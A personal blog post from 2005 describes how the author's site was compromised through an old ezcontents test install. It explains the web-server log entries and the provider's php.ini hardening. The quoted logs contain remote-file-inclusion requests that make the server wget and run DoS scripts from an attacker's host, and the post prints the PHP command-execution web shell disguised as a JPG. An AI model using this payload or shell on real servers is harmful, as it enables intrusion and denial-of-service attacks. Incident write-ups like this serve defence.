More details on php exploit from last week



Ok. I have a bit of time that I can sit down and get a little more detailed on what specifically happened late last week that shut the site down for a couple days.

At one point, I had updated the ezcontents script for the main site (averyjparker.com), but I had left (for about 2 years) a testbed install (at averyjparker.com/ncgen2) trying to setup a platform for an upgrade for the old Genealogy site (www.averyjparker.com/ncgen, new site is now at www.northcarolinagenealogy.net (linked at the top of the page.)) OK, so in searching through the logs here are some of the entries that caught my attention.

63.85.41.229 – - [14/Jul/2005:13:30:31 -0600] “POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1″ 403 319 “http://www.averyjparker.com/” “-”
200.174.133.132 – - [14/Jul/2005:13:11:59 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:01 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:01 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:19 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;
%20chmod%20777%20pdr;%20./pdr HTTP/1.1″ 200 1072 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:09:42 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?
&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:09:21 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=wget HTTP/1.1″ 200 1120 “-” “Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)”

I guess I should preface this, by a simple fact. There are a LOT of exploit attempts that show up in webserver logs. Here’s a sample of one…
211.75.91.2 – - [14/Jul/2005:13:30:24 -0600] “POST /cgi-bin/mailform.pl HTTP/1.0″ 404 290 “http://www.averyjparker.com/” “-”

The first entry is the ip address, then the datestamp, then the specific query *(usually starting with Post or Get, and ending with the version of the protocol.) Next you see 404, that’s the result code and a 404 code means that this file wasn’t found.

What troubled me with the suspicious entries is that the result code was 200 (file found) and it was trying to pass various different bits of information to a php file (/ncgen2//include/db.php) which did exist.

In fact, this bit
?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget
%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl
made it look like they were trying to load this file from caniggiamatador.com. I looked at the source of lila.jpg (not a real image file by the way.) It’s basically an html file wrapped around this…
< ?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp”);
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(“>”, “>”, str_replace(“< ", "<", $output));
?>
ok, so they’re trying to inject this file http://www.caniggiamatador.com/dos.pl and http://www.caniggiamatador.com/perldos.pl

I looked at the code there and they were basically bash scripts that setup a denial of service attack on a specified target. Fairly clever and commented in Portuguese or Spanish. I’ve actually spent some time studying spanish, but there was a lot that was either mispelled, or I simply didn’t understand.

The site is down now by the way. It was hosted by http://www.internetters.net/ it looks like and my service provider dealt with contacting them I suspect.

Since I’m a fairly curious person…. I was also interested in the ip address that was originating the requests 200.174.133.132 An IP whois lookup turned up this…

200.174.133.132 = [ 200-174-133-132-tau.cpe.vivax.com.br ]

I’m guessing a dialup? customer in Brazil (which might back up that the comments were in Portuguese).

I, of course, sent what I found to my service provider. They thanked me for the time I’d spent researching the issue and verified that was the file they were exploiting and that it was a DOS attack against their nameservers. They also sent along a couple of notes on changes to the php.ini that they made to blunt the attack.

disabled_functions: system, cmd, shell_exec, passthru, popen

These were stated to hopefully prevent a future breach by the same method.

Some details of the exploit can be found here.
ezcontents code injection vulnerability

So, how did the find my site to attack. Who knows for certain, but I do have some ideas. I plan to detail those in an upcoming post.

Related Posts

Blog Traffic Exchange Related Posts
  • Network Security guide for the home or small business network - Part 5 - Update your software Okay - so after the last article you've inventoried what software you use on a PC and you know what services (server's) the pc runs that you've told it to. You even know what passes as "normal" startup programs. Now it's time to put that to use. It's time to......
  • NEW exploit for the WMF vulnerability Just when you thought we had a good understanding of the recent zero-day WMF (Windows metafile exploit) it's worse. Sans is reporting on a new variation on the exploit released today. They have gone to yellow (again) to warn people. Here are some details. This exploit was "made by the......
  • ClamAV 0.94.1 to phone home The release candidate for version 0.94.1 of clam antivirus and they are eager for people to get out and test it. There is a new feature in this release called "malware statistics gathering" that will pass along observed malware information back to clamav.net - they hope to be posting statistics......
Blog Traffic Exchange Related Websites
  • Misled By DirecTV? You May Be Entitled To Some Compensation. Here's How... Revenue from last quarter for DirecTV was over $6 billion! For a quarter! And that's not because customers love DirecTV. Just search for DirecTV and you'll find numerous complaints blasting DirecTV's deceptive marketing practices. Here are the most common ones: You are offered a promotion when you sign up which......
  • The London Pass The London Pass is a sightseeing card which gives holders FREE ENTRY to over 55 sights and tourist attractions in London. Customers simply pay the one off price for the London Pass of their choice (there are 4 durations to choose from) and then can enter as many of......
  • Gray Line (New York Tours) Since 1926, Gray Line New York is THE source for NYC's best double decker bus and deluxe motorcoach tours. Enjoy deluxe double decker, hop-on, hop-off bus tours that include Uptown, Downtown, Brooklyn and Night loops. We also offer fully escorted foreign language motorcoach city tours in German, French, Korean,......
en.pdf24.org    Send article as PDF   

Similar Posts


See what happened this day in history from either BBC Wikipedia
Search:
Keywords:
Amazon Logo

Comments are closed.


Switch to our mobile site